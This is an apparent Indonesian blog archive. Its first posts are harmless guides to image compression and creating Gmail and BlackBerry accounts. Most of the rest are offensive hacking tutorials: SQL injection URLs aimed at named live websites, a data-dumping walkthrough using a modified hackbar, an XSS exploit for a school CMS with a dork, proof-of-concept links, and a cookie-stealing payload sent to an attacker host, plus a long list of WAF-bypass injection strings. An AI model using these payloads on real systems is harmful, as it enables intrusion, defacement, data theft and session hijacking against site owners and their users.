Minggu, 09 Agustus 2015

Cara Mengubah Size Gambar atau Compress Gambar

Penulis Artikel : Ahmad Lukman Hakim



Cara Merubah Ukuran Gambar Dari Mb menjadi Kb

Berikut saya sharing pengalaman saya ketika upload gambar dari lokal komputer untuk disisipkan ke Email atau upload gambar yang mempunyai syarat dalam ukuran (size)nya. 

Upload gambar yang ukuran (size)nya terlalu besar tentunya juga membutuhkan waktu yang lebih lama, dibandingkan kalau kita bisa merubahnya menjadi ukuran yang lebih kecil. Apalagi kalau koneksi lambat, dan pada saat waktu-waktu yang penting yang kita diharuskan untuk upload gambar tersebut dengan cepat. 

Tidak hanya pada waktu-waktu tersebut, misalkan kita bekerja di Warnet kemudian ada orang minta kirim gambar melalui Email, dan pada saat itu koneksi internet lagi lambat. Tentunya orang tersebut menunggu info kan, apakah Email tersebut sudah terkirim atau belum? 

Kita ditunggu info tersebut dengan cepat, dan orang tersebut (semua orang) tidak suka menunggu terlalu lama. Nah, salah satu jalan untuk mempercepat uploading gambar tersebut adalah dengan cara merubah ukuran(size) gambar tersebut.
Jadi, bagaimana kita merubah ukuran (size) dari ukuran Mb(megabyte) menjadi Kb(kilobyte)?
Disini saya memakai aplikasi Microsoft Office Pictures Manager, aplikasi ini diinstal satu paket dengan Microsoft Office.

Berikut langkah-langkahnya:
1. Tentuka/Pilih gambar yang akan diubah ukuranya.
2. Disini saya akan mengubah gambar yang bernama "KTP" dengan ukuran 2.96 MB
2. Open dengan aplikasi Microsoft Office Picture Manager
3. Tab Picture => Compress Pictures
4. Ganti dengan Type Documents atau sesuai kebutuhan anda.
5. Klik OK lalu Save.
6. Proses Penyimpanan.
7. Setelah anda Simpan/Save, file mula-mula 2,96 MB menjadi 169 KB. Itulah fungsi Compressing / Mengubah Size gambar dari yang besar menjadi kecil.

Itu,,, Semoga bermanfaat bagi anda yang baru belajar. :D


Cara diatas adalah cara sederhananya, untuk cara mengurangi size gambar tanpa mengurangi kualitasnya ketika di zoom, baca pada artikel: Cara Mengurangi Size Gambar Setelah Scanning Tanpa Mengurangi Kualitas Gambar
Read more

Sabtu, 01 Agustus 2015

Cara Membuat ID Blackbarry Untuk Login BBM

Penulis Artikel : Ahmad Lukman Hakim
 http://global.blackberry.com/content/dam/blackBerry/campaigns/bbm/bbm-logo-square.png 
Cara Membuat ID Blackbarry untuk login aplikasi BBM.
Sebelum anda membuat ID Blackbarry anda diharuskan untuk membuat Email dulu. Terserah anda, mau buat Email Yahoo atau Google Mail (@gmail.com), yang terpenting Email anda masih aktif. Berikut saya sediakan tutorial cara membuat Email Google (@gmail.com).
Nah, setelah anda mempunyai Email, silahkan masuk ke situs https://blackberryid.blackberry.com/bbid/createaccount/ untuk mendaftar ID Blackbarry yang nantinya untuk aplikasi BBM anda.

1. Lakukan pengisian form yang diminta pihak Blackbarry (Wajib Dilengkapi).
Nama Depan & Nama Belakang = Disesuaikan nama anda.
Nama Layar = Nama yang nantinya dimunculkan di BBM.
Kata Sandi = Isi kata sandi anda (terserah). "Disarankan sama dengan kata sandi Email anda".
Nama Pengguna = Alamat Email anda.
Kata Sandi Pemulihan = Isi sebuah pertanyaan pada form "*Pertanyaan" dan jawaban pada form "*Jawaban" (terserah).
2. Cheklist (centang) "Saya ingin menerima informasi..." dan masukkan kode Verifikasi pada form yang disediakan. Lihat gambar dibawah ini:
3. Nah, jika anda melakukan pengisian dengan benar, maka Anda berhasil membuat Blackbarry ID. Kemuadian anda diminta untuk mengkonfirmasi lewat email yang anda masukkan tadi pada form "*Nama Pengguna". >>Silahkan buka Email anda.
4. Buka pesan dari Blackbarry. Lalu klik tulisan "konfirmasi alamat email Anda"
5.Silahkan konfirmasi lagi. Kemudian masukkan kata sandi yang anda tadi buat, tulis pada form "Kata Sandi".
6. ID Blackbary anda berhasil dibuat.
Silahkan buka aplikasi BBMnya lalu Sign In dengan "Alamat Email" dan "Kata Sandi " yang tadi anda dibuat. 



 
Read more

Jumat, 31 Juli 2015

Cara Membuat Email Google [Gmail]

Penulis Artikel : Ahmad Lukman Hakim

Berikut saya akan sharing bagaimana cara membuat Email Google (@gmail.com). Ikuti langkah-langkah berikut ini:

1. Buka Browser. (Google Chrome, Mozilla Firefox, IE)
2. Pada Address Bar, tulis : google.com
3. Tulis di kolom pencarian: gmail sign up
4. Kemudian klik Create your Google Account.

5. Isi form pengisian sesuai nama anda. 
Pada form "Choose your username", itu adalah nama email anda nanti. Apabila ada tulisan: "Nama pengguna tersebut sudah digunakan orang lain. Coba yang lain?" Berarti anda harus merubah nama email anda sehingga tidak ada tulisan seperti tersebut. 
Pada form "Create a password": Isi minimal 8 karakter.  Disarankan kombinasi antara huruf dan angka. Lalu ulangi pada form "Confirm your password".
Pada  form "Birthday" isi sesuai Tanggal lahir anda.
Pada form "Gender" isi sesuai Jenis Kelamin anda.
Pada form "Mobile phone" isi dengan No. Hp anda yang masih aktiv (Nanti untuk pengiriman kode konfirmasi).
Pada form "Your current email address" dikosongi saja.
Pada form "Prove that you're not a robot" di cheklist (centang) Skip this.... Karena nanti akan konfirmasi lewat Hp.
6. Pilih lokasi dimana anda tinggal pada form "Location". Lalu cheklist (centang) "I gree to the google..." . Setelah itu >>Next step
7. "Phone number" diisi sesuai nomor Hp anda yang masih aktiv. Lebih jelasnya ikuti langkah seperti gambar dibawah ini. 
8. Tunggu hingga ada pesan masuk dari pihak Google, biasanya ada kode yang diberikan lewat pesan tersebut. Nah, samakan dan isi kode tersebut pada form dibawah ini.
9. Email Google anda sudah jadi. Silahkan anda lanjutkan ke gmail.com jika ingin mengirim atau menerima pesan.
 Loading pada saat masuk ke Email anda.
Ini adalah tampilan Administrator Email Google anda. Ditempat inilah anda akan mengirim dan menerima pesan dari orang lain atau teman anda.

Berikut saya jelasakan sedikit tentang cara menulis pengetahuan menu dalam gambar dibawah ini.


COMPOSE : Untuk menulis / mengirim email ke orang lain atau teman anda. 
Inbox           : Pesan masuk akan ada di bagian ini. 
Sent Mail     : Adalah tempat pesan-pesan email terkirim yang pernah anda kirim.
Draf             : Adalah tempat email yang baru anda tulis (Belum terkirim).
More            : Untuk melihat lebih banyak lagi pilihan dibawah.
Semoga artikel ini bermanfaat bagi anda yang belum mengerti cara membuat email atau mengoperasikan Email, khususnya Email Google (@gmail.com).






Read more

Kamis, 30 Juli 2015

Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual


Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual 
-  Baiklah :v kali ini saya mau membagikan Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual yups masih banyak yang belum tau bagaimana caranya :v langsung saja kita cari target :D

Oke setelah terinject dan muncul magic number contohnya seperti ini :

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,3,4,5--+

Seperti yang kita ketahui disitu muncul magic number angka 3 untuk menampilkan nama kita, kita bisa menggunakan concat 
Oke kita contohkan saya ingin menampilkan "Injected By Sec7or Team"

Query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(Injected By Sec7or Team),4,5--+

Tapi itu belum selesai yang harus kita lakukan selanjutnya adalah menkonvert 
"Injected By Sec7or Team" menggunakan hex bisa menggunakan tools yang udah kesebar di gugel atau bisa langsung menggunakan hackbar
download di sini
Pada hackbar ini ada otomatis konvert unhex buatan root-kajj jadi pada saat setekah konvert tidak perlu lagi menambah 0x pada depan hasil konvertan jadi query nya adalah

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d),4,5--+



Baiklah untuk menambah pemanis kita juga print versi dan database nya
query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d,version(),database()),4,5--+

Tampilan di atas masih acak acak kalian bisa menambahkan sendiri spasi atau mempermanis dengan menambah tag html :*

Tambahan :

user() : menampilkan user
version() : menampilkan versi
database() : menampilan database

Jika masih ada yang ingin ditanyakan silahkan tanyakan pada komentar :v
Happy suntik menyuntik ;v
Read more

Rabu, 29 Juli 2015

DIOS (dump in one shoot) Dengan Hackbar Modif

dios (dump in one shoot) dengan hackbar modif

halo sobat injector..
kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan  waf sebagai pengamanan website

untuk hackbar modif bisa di donlod di sini...download di sini
ok langsung aja menuju tekape..

sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9

pertama kita test url dengan menambahkan tanda kutip (')



muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.

lakukan perintah order by hingga menemukan kolom eror.

ternyata pada web ini eror terdapat pada kolom 7
selanjutnya gunakan perintah union select
angka ajaib yang muncul 3 dan 4

ok next.. jika selama ini kita hanya tau group_concat(table_name)  untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
klik union based dios mysql,dios by madblod...


dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....

jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...


happy injecting...
Read more

Mengenal Lebih Dekat 'Senjata' Para Injector.


halo sobat injector.. kali ini saya akan membahas tools wajib para injector yaitu hackbar.
apa sih hackbar itu... hackbar adalah salah satu plugins/addons pada browser mozila.

bagi kaum injector..hackbar memang sudah tidak asing lagi..tapi bagi para pemula seperti saya mungkin masih butuh penyesuaian..apalagi jika selama ini kita adalah user havij atau sqlmap.
selama ini kita hanya mengenal hackbar yg secara umum cuma di gunakan untuk basic sql.

tapi kini para leet sql injector sudah memodifikasi hackbar sedemikian rupa sehingga lebih mudah di gunakan dan tentunya lebih powerfull,karena di lengkapi dengan DIOS(dump in one shoot) baik itu untuk mysql,mssql ataupun error based dios.

dan kerennya lagi hackbar modifan ini di lengkapi dengan query string yang di gunakan untuk membypass WAF..yangg kadang-kadang bikin kita pusing tujuh keliling.

berikut penampakan hackbar modifannya..



silahkan download di sini.. download di sini



happy injecting...

Read more

Bug XSS Di CMS Balitbang All Version


halo sobat injector.. kali ini akan kami bagi satu lagi bug di web berbasis cms balitbang... cekidot...:D

# Exploit Title:: bug XSS on CMS balitbang all version
# Date :: 2015-07-13
# Homepage:https ::divisidatalitbang.net
# Exploit Author:: Minato
# Dork :: site:sch.id atau bisa dikembangin lagi
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
dan bnyk lagy yg lainnya
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS concept attacking ::GET PHPSESSID untuk menjadi admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>

nantikan trik trik sqli kami selanjutnya...:D
Read more

Selasa, 28 Juli 2015

MACAM MACAM BYPASS WAF

dalam dunia injector kita tidak asing lagi dengan istilah WAF.
apasih waf itu... waf adalah kepanjangan (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

jadi.....rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )

untuk itu saya akan sedikit berbagi tentang jenis2 waf yg biasa di gunakan dalam dunia injector..:D

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

gmana...lumayan banyak kan... ga usah di hafal...ntar bikin botak...
karena sebagai sulusinya udah sya sertakan hackbar yg sudah include byapass wafnya.
bisa di donlod di sini hackbar modif

happy injecting...:D
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpu
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
Read more